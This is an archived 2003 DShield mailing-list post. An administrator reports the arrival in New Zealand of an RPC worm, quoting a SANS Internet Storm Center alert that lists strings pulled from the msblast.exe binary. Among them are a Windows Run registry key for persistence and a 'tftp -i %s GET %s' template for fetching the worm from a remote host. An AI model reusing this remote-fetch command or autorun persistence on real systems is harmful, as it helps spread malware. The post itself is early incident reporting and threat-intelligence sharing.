[Dshield] infocon: yellow

Andy Hopkins Andy.Hopkins at healthAlliance.co.nz
Mon Aug 11 20:27:55 GMT 2003


FYI: It's started here in NZ at 02:30 local time

------------------------------------------
Andy Hopkins
Senior Unix & Firewall Administrator
healthAlliance

(+64) (9) 486 8944
(+64) (25) 285 2139

Disclaimer:
The views and information expressed in this e-Mail are actually mine,
because my partner says so!
healthAlliance doesn't necessarily agree with me either



-----Original Message-----
From: Johannes B. Ullrich [mailto:jullrich at sans.org]
Sent: Tuesday, 12 August 2003 06:24
To: list at dshield.org
Subject: [Dshield] infocon: yellow



We just got a binary that looks very much like an
RPC worm. It scans for port 135. No real idea what it does (other than
scanning).

Strings from the file:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? 
 Stop making money and fix your software
windowsupdate.com

BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
tftp -i %s GET %s




-- 
SANS - Internet Storm Center
http://isc.sans.org
PGP Key: http://isc.sans.org/jullrich.txt
